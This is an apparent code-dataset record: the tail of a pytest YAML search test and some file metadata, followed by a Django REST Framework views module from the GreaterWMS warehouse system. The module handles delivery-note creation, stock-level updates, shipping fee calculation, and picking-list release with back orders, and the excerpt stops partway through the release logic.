'tests/fixtures/yaml/service-nginx.yaml',
'tests/fixtures/yaml/service-haproxy.yaml',
])
@pytest.mark.search_dpath
def test_search_dpath_6():
t.assertCountEqual(yi.search_dpath('**/nginx'), [
'tests/fixtures/yaml/service-nginx.yaml',
'tests/fixtures/yaml/deployment.yaml',
'tests/fixtures/yaml/pod.yaml',
])
| 24.330233
| 89
| 0.650354
| 656
| 5,231
| 4.984756
| 0.097561
| 0.147095
| 0.187156
| 0.183486
| 0.91896
| 0.877064
| 0.816514
| 0.744343
| 0.696024
| 0.64893
| 0
| 0.009309
| 0.178551
| 5,231
| 214
| 90
| 24.443925
| 0.751687
| 0.004015
| 0
| 0.66875
| 0
| 0
| 0.327957
| 0.246736
| 0
| 0
| 0
| 0
| 0.15
| 1
| 0.15625
| false
| 0
| 0.01875
| 0
| 0.175
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e67d9355d651996b20e5c063657bfb1dc348bb30
| 131,303
|
py
|
Python
|
dn/views.py
|
Briliant-wang/GreaterWMS
|
6b8a6515901ec09b5a2a754a8470f7229a2820cf
|
[
"Apache-2.0"
] | 1
|
2022-01-10T18:31:12.000Z
|
2022-01-10T18:31:12.000Z
|
dn/views.py
|
jiangtaojiang/GreaterWMS
|
df155ae774398846c3c96f581debc4ea676548f5
|
[
"Apache-2.0"
] | null | null | null |
dn/views.py
|
jiangtaojiang/GreaterWMS
|
df155ae774398846c3c96f581debc4ea676548f5
|
[
"Apache-2.0"
] | null | null | null |
from rest_framework import viewsets
from .models import DnListModel, DnDetailModel, PickingListModel
from . import serializers
from .page import MyPageNumberPaginationDNList
from utils.page import MyPageNumberPagination
from utils.datasolve import sumOfList, transportation_calculate
from rest_framework.filters import OrderingFilter
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework.response import Response
from .filter import DnListFilter, DnDetailFilter, DnPickingListFilter
from rest_framework.exceptions import APIException
from customer.models import ListModel as customer
from warehouse.models import ListModel as warehouse
from binset.models import ListModel as binset
from goods.models import ListModel as goods
from payment.models import TransportationFeeListModel as transportation
from stock.models import StockListModel as stocklist
from stock.models import StockBinModel as stockbin
from driver.models import ListModel as driverlist
from driver.models import DispatchListModel as driverdispatch
from scanner.models import ListModel as scanner
from cyclecount.models import QTYRecorder as qtychangerecorder
from cyclecount.models import CyclecountModeDayModel as cyclecount
from django.db.models import Q
from django.db.models import Sum
from utils.md5 import Md5
import re
from .serializers import FileListRenderSerializer, FileDetailRenderSerializer
from django.http import StreamingHttpResponse
from django.utils import timezone
from .files import FileListRenderCN, FileListRenderEN, FileDetailRenderCN, FileDetailRenderEN
from rest_framework.settings import api_settings
from .serializers import SannerDnDetailGetSerializer
class SannerDnDetailView(viewsets.ModelViewSet):
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnDetailFilter
def list(self, request, *args, **kwargs):
bar_code = request.GET.get('bar_code')
DnList_obj=DnListModel.objects.filter(openid=self.request.auth.openid, is_delete=False,dn_status=3,bar_code=bar_code).first()
queryset = DnDetailModel.objects.filter(openid=self.request.auth.openid,dn_code=DnList_obj.dn_code,is_delete=False)
page = self.paginate_queryset(queryset)
if page is not None:
serializer = self.get_serializer(page, many=True)
return self.get_paginated_response(serializer.data)
serializer = self.get_serializer(queryset, many=True)
return Response(serializer.data)
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return DnDetailModel.objects.filter(openid=self.request.auth.openid, is_delete=False)
else:
return DnDetailModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnDetailModel.objects.none()
def get_serializer_class(self):
if self.action in ['list', 'retrieve', 'destroy']:
return serializers.SannerDnDetailGetSerializer
else:
return self.http_method_not_allowed(request=self.request)
class DnListViewSet(viewsets.ModelViewSet):
"""
retrieve:
Response a data list(get)
list:
Response a data list(all)
create:
Create a data line(post)
delete:
Delete a data line(delete)
"""
pagination_class = MyPageNumberPaginationDNList
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnListFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return DnListModel.objects.filter(openid=self.request.auth.openid, is_delete=False)
else:
return DnListModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnListModel.objects.none()
def get_serializer_class(self):
if self.action in ['list', 'retrieve', 'destroy']:
return serializers.DNListGetSerializer
elif self.action in ['create']:
return serializers.DNListPostSerializer
elif self.action in ['update']:
return serializers.DNListUpdateSerializer
elif self.action in ['partial_update']:
return serializers.DNListPartialUpdateSerializer
else:
return self.http_method_not_allowed(request=self.request)
def create(self, request, *args, **kwargs):
data = self.request.data
data['openid'] = self.request.auth.openid
if DnListModel.objects.filter(openid=data['openid'], is_delete=False).exists():
dn_last_code = DnListModel.objects.filter(openid=data['openid']).first().dn_code
dn_add_code = str(int(re.findall(r'\d+', str(dn_last_code), re.IGNORECASE)[0]) + 1).zfill(8)
data['dn_code'] = 'DN' + dn_add_code
else:
data['dn_code'] = 'DN00000001'
data['bar_code'] = Md5.md5(str(data['dn_code']))
serializer = self.get_serializer(data=data)
serializer.is_valid(raise_exception=True)
serializer.save()
scanner.objects.create(openid=self.request.auth.openid, mode="DN", code=data['dn_code'],
bar_code=data['bar_code'])
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=200, headers=headers)
def destroy(self, request, pk):
qs = self.get_object()
if qs.openid != self.request.auth.openid:
raise APIException({"detail": "Cannot delete data which not yours"})
else:
if qs.dn_status == 1:
qs.is_delete = True
dn_detail_list = DnDetailModel.objects.filter(openid=self.request.auth.openid, dn_code=qs.dn_code,
dn_status=1, is_delete=False)
for i in range(len(dn_detail_list)):
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[i].goods_code)).first()
goods_qty_change.dn_stock = goods_qty_change.dn_stock - int(dn_detail_list[i].goods_qty)
goods_qty_change.save()
dn_detail_list.update(is_delete=True)
qs.save()
return Response({"detail": "success"}, status=200)
else:
raise APIException({"detail": "This order has Confirmed or Deliveried"})
class DnDetailViewSet(viewsets.ModelViewSet):
"""
retrieve:
Response a data list(get)
list:
Response a data list(all)
create:
Create a data line(post)
update:
Update a data(put:update)
"""
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnDetailFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return DnDetailModel.objects.filter(openid=self.request.auth.openid, is_delete=False)
else:
return DnDetailModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnDetailModel.objects.none()
def get_serializer_class(self):
if self.action in ['list', 'retrieve', 'destroy']:
return serializers.DNDetailGetSerializer
elif self.action in ['create']:
return serializers.DNDetailPostSerializer
elif self.action in ['update']:
return serializers.DNDetailUpdateSerializer
else:
return self.http_method_not_allowed(request=self.request)
def create(self, request, *args, **kwargs):
data = self.request.data
if DnListModel.objects.filter(openid=self.request.auth.openid, dn_code=str(data['dn_code']), is_delete=False).exists():
if customer.objects.filter(openid=self.request.auth.openid, customer_name=str(data['customer']), is_delete=False).exists():
for i in range(len(data['goods_code'])):
if goods.objects.filter(openid=self.request.auth.openid,
goods_code=str(data['goods_code'][i]),
is_delete=False).exists():
check_data = {
'openid': self.request.auth.openid,
'dn_code': str(data['dn_code']),
'customer': str(data['customer']),
'goods_code': str(data['goods_code'][i]),
'goods_qty': int(data['goods_qty'][i]),
'creater': str(data['creater'])
}
serializer = self.get_serializer(data=check_data)
serializer.is_valid(raise_exception=True)
else:
raise APIException({"detail": str(data['goods_code'][i]) + " does not exists"})
post_data_list = []
weight_list = []
volume_list = []
cost_list = []
for j in range(len(data['goods_code'])):
goods_detail = goods.objects.filter(openid=self.request.auth.openid,
goods_code=str(data['goods_code'][j]),
is_delete=False).first()
goods_weight = round(goods_detail.goods_weight * int(data['goods_qty'][j]) / 1000, 4)
goods_volume = round(goods_detail.unit_volume * int(data['goods_qty'][j]), 4)
goods_cost = round(goods_detail.goods_price * int(data['goods_qty'][j]), 2)
if stocklist.objects.filter(openid=self.request.auth.openid, goods_code=str(data['goods_code'][j]),
can_order_stock__gte=0).exists():
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(data['goods_code'][j])).first()
goods_qty_change.dn_stock = goods_qty_change.dn_stock + int(data['goods_qty'][j])
goods_qty_change.save()
else:
stocklist.objects.create(openid=self.request.auth.openid,
goods_code=str(data['goods_code'][j]),
goods_desc=goods_detail.goods_desc,
dn_stock=int(data['goods_qty'][j]))
post_data = DnDetailModel(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
customer=str(data['customer']),
goods_code=str(data['goods_code'][j]),
goods_qty=int(data['goods_qty'][j]),
goods_weight=goods_weight,
goods_volume=goods_volume,
goods_cost=goods_cost,
creater=str(data['creater']))
weight_list.append(goods_weight)
volume_list.append(goods_volume)
cost_list.append(goods_cost)
post_data_list.append(post_data)
total_weight = sumOfList(weight_list, len(weight_list))
total_volume = sumOfList(volume_list, len(volume_list))
total_cost = sumOfList(cost_list, len(cost_list))
customer_city = customer.objects.filter(openid=self.request.auth.openid,
customer_name=str(data['customer']),
is_delete=False).first().customer_city
warehouse_city = warehouse.objects.filter(openid=self.request.auth.openid).first().warehouse_city
transportation_fee = transportation.objects.filter(
Q(openid=self.request.auth.openid, send_city__icontains=warehouse_city, receiver_city__icontains=customer_city,
is_delete=False) | Q(openid='init_data', send_city__icontains=warehouse_city, receiver_city__icontains=customer_city,
is_delete=False))
transportation_res = {
"detail": []
}
if len(transportation_fee) >= 1:
transportation_list = []
for k in range(len(transportation_fee)):
transportation_cost = transportation_calculate(total_weight,
total_volume,
transportation_fee[k].weight_fee,
transportation_fee[k].volume_fee,
transportation_fee[k].min_payment)
transportation_detail = {
"transportation_supplier": transportation_fee[k].transportation_supplier,
"transportation_cost": transportation_cost
}
transportation_list.append(transportation_detail)
transportation_res['detail'] = transportation_list
DnDetailModel.objects.bulk_create(post_data_list, batch_size=100)
DnListModel.objects.filter(openid=self.request.auth.openid, dn_code=str(data['dn_code'])).update(
customer=str(data['customer']), total_weight=total_weight, total_volume=total_volume,
total_cost=total_cost, transportation_fee=transportation_res)
return Response({"detail": "success"}, status=200)
else:
raise APIException({"detail": "customer does not exists"})
else:
raise APIException({"detail": "DN Code does not exists"})
def update(self, request, *args, **kwargs):
data = self.request.data
if DnListModel.objects.filter(openid=self.request.auth.openid, dn_code=str(data['dn_code']),
dn_status=1, is_delete=False).exists():
if customer.objects.filter(openid=self.request.auth.openid, customer_name=str(data['customer']),
is_delete=False).exists():
for i in range(len(data['goods_code'])):
check_data = {
'openid': self.request.auth.openid,
'dn_code': str(data['dn_code']),
'customer': str(data['customer']),
'goods_code': str(data['goods_code'][i]),
'goods_qty': int(data['goods_qty'][i]),
'creater': str(data['creater'])
}
serializer = self.get_serializer(data=check_data)
serializer.is_valid(raise_exception=True)
dn_detail_list = DnDetailModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']), is_delete=False)
for v in range(len(dn_detail_list)):
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[v].goods_code)).first()
goods_qty_change.dn_stock = goods_qty_change.dn_stock - dn_detail_list[v].goods_qty
if goods_qty_change.dn_stock < 0:
goods_qty_change.dn_stock = 0
goods_qty_change.save()
dn_detail_list[v].is_delete = True
dn_detail_list[v].save()
post_data_list = []
weight_list = []
volume_list = []
cost_list = []
for j in range(len(data['goods_code'])):
goods_detail = goods.objects.filter(openid=self.request.auth.openid,
goods_code=str(data['goods_code'][j]),
is_delete=False).first()
goods_weight = round(goods_detail.goods_weight * int(data['goods_qty'][j]) / 1000, 4)
goods_volume = round(goods_detail.unit_volume * int(data['goods_qty'][j]), 4)
goods_cost = round(goods_detail.goods_price * int(data['goods_qty'][j]), 2)
if stocklist.objects.filter(openid=self.request.auth.openid, goods_code=str(data['goods_code'][j]),
can_order_stock__gt=0).exists():
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(data['goods_code'][j])).first()
goods_qty_change.dn_stock = goods_qty_change.dn_stock + int(data['goods_qty'][j])
goods_qty_change.save()
else:
stocklist.objects.create(openid=self.request.auth.openid,
goods_code=str(data['goods_code'][j]),
goods_desc=goods_detail.goods_desc,
dn_stock=int(data['goods_qty'][j]))
post_data = DnDetailModel(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
customer=str(data['customer']),
goods_code=str(data['goods_code'][j]),
goods_qty=int(data['goods_qty'][j]),
goods_weight=goods_weight,
goods_volume=goods_volume,
goods_cost=goods_cost,
creater=str(data['creater']))
weight_list.append(goods_weight)
volume_list.append(goods_volume)
cost_list.append(goods_cost)
post_data_list.append(post_data)
total_weight = sumOfList(weight_list, len(weight_list))
total_volume = sumOfList(volume_list, len(volume_list))
total_cost = sumOfList(cost_list, len(cost_list))
customer_city = customer.objects.filter(openid=self.request.auth.openid,
customer_name=str(data['customer']),
is_delete=False).first().customer_city
warehouse_city = warehouse.objects.filter(openid=self.request.auth.openid).first().warehouse_city
transportation_fee = transportation.objects.filter(
Q(openid=self.request.auth.openid, send_city__icontains=warehouse_city,
receiver_city__icontains=customer_city,
is_delete=False) | Q(openid='init_data', send_city__icontains=warehouse_city,
receiver_city__icontains=customer_city,
is_delete=False))
transportation_res = {
"detail": []
}
if len(transportation_fee) >= 1:
transportation_list = []
for k in range(len(transportation_fee)):
transportation_cost = transportation_calculate(total_weight,
total_volume,
transportation_fee[k].weight_fee,
transportation_fee[k].volume_fee,
transportation_fee[k].min_payment)
transportation_detail = {
"transportation_supplier": transportation_fee[k].transportation_supplier,
"transportation_cost": transportation_cost
}
transportation_list.append(transportation_detail)
transportation_res['detail'] = transportation_list
DnDetailModel.objects.bulk_create(post_data_list, batch_size=100)
DnListModel.objects.filter(openid=self.request.auth.openid, dn_code=str(data['dn_code'])).update(
customer=str(data['customer']), total_weight=total_weight, total_volume=total_volume,
total_cost=total_cost, transportation_fee=transportation_res)
return Response({"detail": "success"}, status=200)
else:
raise APIException({"detail": "Customer does not exists"})
else:
raise APIException({"detail": "DN Code has been Confirmed or does not exists"})
def destroy(self, request, pk):
qs = self.get_object()
if qs.openid != self.request.auth.openid:
raise APIException({"detail": "Cannot delete data which not yours"})
else:
if qs.dn_status == 2 and qs.back_order_label:
qs.is_delete = True
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(qs.goods_code)).first()
goods_qty_change.back_order_stock = goods_qty_change.back_order_stock - int(qs.goods_qty)
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - int(qs.goods_qty)
goods_qty_change.save()
qs.save()
if DnDetailModel.objects.filter(openid=self.request.auth.openid, dn_code=qs.dn_code, is_delete=False).exists():
pass
else:
DnListModel.objects.filter(openid=self.request.auth.openid, dn_code=qs.dn_code).update(is_delete=True)
return Response({"detail": "success"}, status=200)
else:
raise APIException({"detail": "This order has Confirmed or Deliveried"})
class DnViewPrintViewSet(viewsets.ModelViewSet):
"""
retrieve:
Response a data list(get)
"""
serializer_class = serializers.DNListGetSerializer
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnListFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return DnListModel.objects.filter(openid=self.request.auth.openid, is_delete=False)
else:
return DnListModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnListModel.objects.none()
def get_serializer_class(self):
if self.action in ['retrieve']:
return serializers.DNDetailGetSerializer
else:
return self.http_method_not_allowed(request=self.request)
def retrieve(self, request, pk):
qs = self.get_object()
if qs.openid != self.request.auth.openid:
raise APIException({"detail": "Cannot update data which not yours"})
else:
context = {}
dn_detail_list = DnDetailModel.objects.filter(openid=self.request.auth.openid,
dn_code=qs.dn_code,
is_delete=False)
dn_detail = serializers.DNDetailGetSerializer(dn_detail_list, many=True)
customer_detail = customer.objects.filter(openid=self.request.auth.openid,
customer_name=qs.customer).first()
warehouse_detail = warehouse.objects.filter(openid=self.request.auth.openid).first()
context['dn_detail'] = dn_detail.data
context['customer_detail'] = {
"customer_name": customer_detail.customer_name,
"customer_city": customer_detail.customer_city,
"customer_address": customer_detail.customer_address,
"customer_contact": customer_detail.customer_contact
}
context['warehouse_detail'] = {
"warehouse_name": warehouse_detail.warehouse_name,
"warehouse_city": warehouse_detail.warehouse_city,
"warehouse_address": warehouse_detail.warehouse_address,
"warehouse_contact": warehouse_detail.warehouse_contact
}
return Response(context, status=200)
class DnNewOrderViewSet(viewsets.ModelViewSet):
"""
retrieve:
Response a data list(get)
"""
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnListFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return DnListModel.objects.filter(openid=self.request.auth.openid, is_delete=False)
else:
return DnListModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnListModel.objects.none()
def get_serializer_class(self):
if self.action in ['create']:
return serializers.DNListPartialUpdateSerializer
else:
return self.http_method_not_allowed(request=self.request)
def create(self, request, pk):
qs = self.get_object()
if qs.openid != self.request.auth.openid:
raise APIException({"detail": "Cannot delete data which not yours"})
else:
if qs.dn_status == 1:
if DnDetailModel.objects.filter(openid=self.request.auth.openid, dn_code=qs.dn_code,
dn_status=1, is_delete=False).exists():
qs.dn_status = 2
dn_detail_list = DnDetailModel.objects.filter(openid=self.request.auth.openid, dn_code=qs.dn_code,
dn_status=1, is_delete=False)
for i in range(len(dn_detail_list)):
if stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[i].goods_code)).exists():
pass
else:
goods_detail = goods.objects.filter(openid=self.request.auth.openid, goods_code=str(dn_detail_list[i].goods_code)).first()
stocklist.objects.create(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[i].goods_code),
goods_desc=goods_detail.goods_desc,
supplier=goods_detail.goods_supplier)
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(
dn_detail_list[i].goods_code)).first()
goods_qty_change.can_order_stock = goods_qty_change.can_order_stock - dn_detail_list[i].goods_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock + dn_detail_list[i].goods_qty
goods_qty_change.dn_stock = goods_qty_change.dn_stock - dn_detail_list[i].goods_qty
if goods_qty_change.can_order_stock < 0:
goods_qty_change.can_order_stock = 0
goods_qty_change.save()
dn_detail_list.update(dn_status=2)
qs.save()
serializer = self.get_serializer(qs, many=False)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=200, headers=headers)
else:
raise APIException({"detail": "Please Enter The DN Detail"})
else:
raise APIException({"detail": "This DN Status Is Not Pre Order"})
class DnOrderReleaseViewSet(viewsets.ModelViewSet):
"""
retrieve:
Response a data list(get)
"""
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnListFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return DnListModel.objects.filter(openid=self.request.auth.openid, dn_status=2, is_delete=False).order_by('create_time')
else:
return DnListModel.objects.filter(openid=self.request.auth.openid, dn_status=2, id=id, is_delete=False)
else:
return DnListModel.objects.none()
def get_serializer_class(self):
if self.action in ['create', 'update']:
return serializers.DNListUpdateSerializer
else:
return self.http_method_not_allowed(request=self.request)
def create(self, request, *args, **kwargs):
qs = self.get_queryset()
for v in range(len(qs)):
dn_detail_list = DnDetailModel.objects.filter(openid=self.request.auth.openid, dn_code=qs[v].dn_code,
dn_status=2, is_delete=False)
picking_list = []
picking_list_label = 0
back_order_list = []
back_order_list_label = 0
back_order_goods_weight_list = []
back_order_goods_volume_list = []
back_order_goods_cost_list = []
back_order_base_code = DnListModel.objects.filter(openid=self.request.auth.openid,
is_delete=False).order_by('-id').first().dn_code
dn_last_code = re.findall(r'\d+', str(back_order_base_code), re.IGNORECASE)
back_order_dn_code = 'DN' + str(int(dn_last_code[0]) + 1).zfill(8)
bar_code = Md5.md5(back_order_dn_code)
total_weight = qs[v].total_weight
total_volume = qs[v].total_volume
total_cost = qs[v].total_cost
for i in range(len(dn_detail_list)):
goods_detail = goods.objects.filter(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[i].goods_code),
is_delete=False).first()
if stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[i].goods_code)).exists():
pass
else:
stocklist.objects.create(openid=self.request.auth.openid,
goods_code=str(goods_detail.goods_code),
goods_desc=goods_detail.goods_desc,
dn_stock=int(dn_detail_list[i].goods_qty))
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(
dn_detail_list[i].goods_code)).first()
goods_bin_stock_list = stockbin.objects.filter(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[i].goods_code),
bin_property="Normal").order_by('id')
can_pick_qty = goods_qty_change.onhand_stock - \
goods_qty_change.inspect_stock - \
goods_qty_change.hold_stock - \
goods_qty_change.damage_stock - \
goods_qty_change.pick_stock - \
goods_qty_change.picked_stock
if can_pick_qty > 0:
if dn_detail_list[i].goods_qty > can_pick_qty:
if qs[v].back_order_label == False:
dn_pick_qty = dn_detail_list[i].pick_qty
for j in range(len(goods_bin_stock_list)):
bin_can_pick_qty = goods_bin_stock_list[j].goods_qty - \
goods_bin_stock_list[j].pick_qty - \
goods_bin_stock_list[j].picked_qty
if bin_can_pick_qty > 0:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[
j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_pick_qty = dn_pick_qty + bin_can_pick_qty
goods_qty_change.save()
goods_bin_stock_list[j].save()
elif bin_can_pick_qty == 0:
continue
else:
continue
dn_detail_list[i].pick_qty = dn_pick_qty
dn_back_order_qty = dn_detail_list[i].goods_qty - \
dn_detail_list[i].pick_qty - \
dn_detail_list[i].picked_qty
dn_detail_list[i].goods_qty = dn_pick_qty
dn_detail_list[i].dn_status = 3
goods_qty_change.back_order_stock = goods_qty_change.back_order_stock + \
dn_back_order_qty
back_order_goods_volume = round(goods_detail.unit_volume * dn_back_order_qty, 4)
back_order_goods_weight = round(
(goods_detail.goods_weight * dn_back_order_qty) / 1000, 4)
back_order_goods_cost = round(goods_detail.goods_price * dn_back_order_qty, 2)
back_order_list.append(DnDetailModel(dn_code=back_order_dn_code,
dn_status=2,
customer=qs[v].customer,
goods_code=dn_detail_list[i].goods_code,
goods_qty=dn_back_order_qty,
goods_weight=back_order_goods_weight,
goods_volume=back_order_goods_volume,
goods_cost=back_order_goods_cost,
creater=self.request.auth.name,
back_order_label=True,
openid=self.request.auth.openid,
create_time=dn_detail_list[i].create_time))
back_order_list_label = 1
total_weight = total_weight - back_order_goods_weight
total_volume = total_volume - back_order_goods_volume
total_cost = total_cost - back_order_goods_cost
dn_detail_list[i].goods_weight = dn_detail_list[i].goods_weight - \
back_order_goods_weight
dn_detail_list[i].goods_volume = dn_detail_list[i].goods_volume - \
back_order_goods_volume
dn_detail_list[i].goods_cost = dn_detail_list[i].goods_cost - \
back_order_goods_cost
back_order_goods_weight_list.append(back_order_goods_weight)
back_order_goods_volume_list.append(back_order_goods_volume)
back_order_goods_cost_list.append(back_order_goods_cost)
goods_qty_change.save()
dn_detail_list[i].save()
else:
dn_pick_qty = dn_detail_list[i].pick_qty
for j in range(len(goods_bin_stock_list)):
bin_can_pick_qty = goods_bin_stock_list[j].goods_qty - \
goods_bin_stock_list[j].pick_qty - \
goods_bin_stock_list[j].picked_qty
if bin_can_pick_qty > 0:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[
j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_pick_qty = dn_pick_qty + bin_can_pick_qty
goods_qty_change.save()
goods_bin_stock_list[j].save()
elif bin_can_pick_qty == 0:
continue
else:
continue
dn_detail_list[i].pick_qty = dn_pick_qty
dn_back_order_qty = dn_detail_list[i].goods_qty - \
dn_detail_list[i].pick_qty - \
dn_detail_list[i].picked_qty
dn_detail_list[i].goods_qty = dn_pick_qty
dn_detail_list[i].dn_status = 3
back_order_goods_volume = round(goods_detail.unit_volume * dn_back_order_qty, 4)
back_order_goods_weight = round(
(goods_detail.goods_weight * dn_back_order_qty) / 1000, 4)
back_order_goods_cost = round(goods_detail.goods_price * dn_back_order_qty, 2)
back_order_list.append(DnDetailModel(dn_code=back_order_dn_code,
dn_status=2,
customer=qs[v].customer,
goods_code=dn_detail_list[i].goods_code,
goods_qty=dn_back_order_qty,
goods_weight=back_order_goods_weight,
goods_volume=back_order_goods_volume,
goods_cost=back_order_goods_cost,
creater=self.request.auth.name,
back_order_label=True,
openid=self.request.auth.openid,
create_time=dn_detail_list[i].create_time))
back_order_list_label = 1
total_weight = total_weight - back_order_goods_weight
total_volume = total_volume - back_order_goods_volume
total_cost = total_cost - back_order_goods_cost
dn_detail_list[i].goods_weight = dn_detail_list[i].goods_weight - \
back_order_goods_weight
dn_detail_list[i].goods_volume = dn_detail_list[i].goods_volume - \
back_order_goods_volume
dn_detail_list[i].goods_cost = dn_detail_list[i].goods_cost - \
back_order_goods_cost
back_order_goods_weight_list.append(back_order_goods_weight)
back_order_goods_volume_list.append(back_order_goods_volume)
back_order_goods_cost_list.append(back_order_goods_cost)
dn_detail_list[i].save()
elif dn_detail_list[i].goods_qty == can_pick_qty:
for j in range(len(goods_bin_stock_list)):
bin_can_pick_qty = goods_bin_stock_list[j].goods_qty - goods_bin_stock_list[
j].pick_qty - \
goods_bin_stock_list[j].picked_qty
if bin_can_pick_qty > 0:
dn_need_pick_qty = dn_detail_list[i].goods_qty - dn_detail_list[i].pick_qty - \
dn_detail_list[i].picked_qty
if dn_need_pick_qty > bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[
j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + bin_can_pick_qty
goods_bin_stock_list[j].save()
goods_qty_change.save()
elif dn_need_pick_qty == bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[
j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + bin_can_pick_qty
dn_detail_list[i].dn_status = 3
dn_detail_list[i].save()
goods_bin_stock_list[j].save()
goods_qty_change.save()
break
else:
break
elif bin_can_pick_qty == 0:
continue
else:
continue
elif dn_detail_list[i].goods_qty < can_pick_qty:
for j in range(len(goods_bin_stock_list)):
bin_can_pick_qty = goods_bin_stock_list[j].goods_qty - \
goods_bin_stock_list[j].pick_qty - \
goods_bin_stock_list[j].picked_qty
if bin_can_pick_qty > 0:
dn_need_pick_qty = dn_detail_list[i].goods_qty - \
dn_detail_list[i].pick_qty - \
dn_detail_list[i].picked_qty
if dn_need_pick_qty > bin_can_pick_qty:
